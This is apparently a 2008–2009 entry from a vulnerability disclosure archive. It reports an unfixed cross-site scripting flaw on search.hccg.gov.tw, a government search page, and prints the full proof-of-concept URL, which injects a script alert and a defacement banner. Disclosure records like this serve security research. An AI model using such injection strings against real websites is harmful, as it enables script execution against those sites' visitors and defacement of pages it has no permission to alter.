Security researcher xylitol, has submitted on 11/11/2008 a cross-site-scripting (XSS) vulnerability affecting search.hccg.gov.tw, which at the time of submission ranked 217770 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/01/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 11/11/2008 |
Date published: 07/01/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: xylitol |
Domain: search.hccg.gov.tw |
Category: XSS |
Pagerank: 217770 |
URL: http://search.hccg.gov.tw/irms22/SampleKits_Std_Jsp/Demo_Files_Search_ch.jsp?AUTHOR=&ENCODE=&FILEDAT E1=&FILEDATE2=&FILENAME=&FILEPATH=&FILESIZE=&FILETYPE=&TITLE=&a=10&o=&oa=1&p=%E7%B6%B2%E5%9D%80&s=po stDB%2CpieceDB%2ChccgWEB%2Cweb1%27,%27%27,%27%27,%27res%27,%2733%27,%27%27)%27%22%3E%3C/title%3E%3Cs cript%3Ealert(1337)%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee %3E |
Click here to view the mirror
|
|
|